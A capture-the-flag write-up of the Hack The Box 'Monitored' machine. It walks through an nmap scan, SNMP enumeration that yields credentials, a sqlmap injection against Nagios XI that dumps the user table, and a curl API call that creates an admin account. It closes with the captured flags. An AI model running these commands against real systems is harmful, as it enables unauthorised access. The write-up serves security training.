Featured image of post Htb_monitored
Htb Boxes

Htb_monitored

HTB monitored

Writeup for HTB monitored box

rated: medium category: web

Nmap Scan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT


Warning: 10.10.11.248 giving up on port because retransmission cap hit (6).
Nmap scan report for monitored.htb (10.10.11.248)
Host is up (0.36s latency).
Not shown: 988 closed ports
PORT      STATE         SERVICE      VERSION
68/udp    open|filtered dhcpc
123/udp   open          ntp          NTP v4 (unsynchronized)
| ntp-info: 
|_  
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 6f3fa7421af94c6500000000
|   snmpEngineBoots: 35
|_  snmpEngineTime: 48m05s
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:389          0.0.0.0:0
|   TCP  127.0.0.1:25         0.0.0.0:0
|_  UDP  0.0.0.0:68           *:*
| snmp-processes: 
|   1: 
| 
|   2: 
| 
|_  3: 
| snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
|_  System uptime: 48m5.77s (288577 timeticks)
|_snmp-win32-software: 
162/udp   open          snmp         net-snmp; net-snmp SNMPv3 server
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 5a44ab2146ff4c6500000000
|   snmpEngineBoots: 26
|_  snmpEngineTime: 48m05s
1100/udp  open|filtered mctp
1813/udp  open|filtered radacct
3130/udp  open|filtered squid-ipc
19500/udp open|filtered unknown
22053/udp open|filtered unknown
27444/udp open|filtered Trinoo_Bcast
44190/udp open|filtered unknown
49259/udp open|filtered unknown
Service Info: Host: monitored

Host script results:
|_clock-skew: 10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds

Snmp enumeration

1

snmpwalk -v1 -c public  monitored.htb

we get creds for username: svc pass: XjH7VCehowpR1xZB

Making a post request to /api/v1/authenticate we get access token that we can use to login

1
2


https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0

this nagios is vulnerable to sql injection » see here

1

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" --cookie "nagiosxi=40ka0uvgngmjev8i267hq2qt9p" --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump

Dumping the db enables us to get an admin api key : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

We can now create our owm user with full privilldeges

1

curl -XPOST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK&pretty=1" -d "username=test&password=test&name=test&email=test@test.com&auth_level=admin"

Uploads a reverse shell by creating a command and checking it

user.txt 5428c0b228e51f2428525f3faa3fcca2

To escalate privilldges we modify the setuid binary npcd

root.txt 9893d1d8c72bc11111a49fcb508ac07a

Licensed under CC BY-NC-SA 4.0
© 2023 - 2024 f0rk3b0mb
Built with Hugo
Theme Stack designed by Jimmy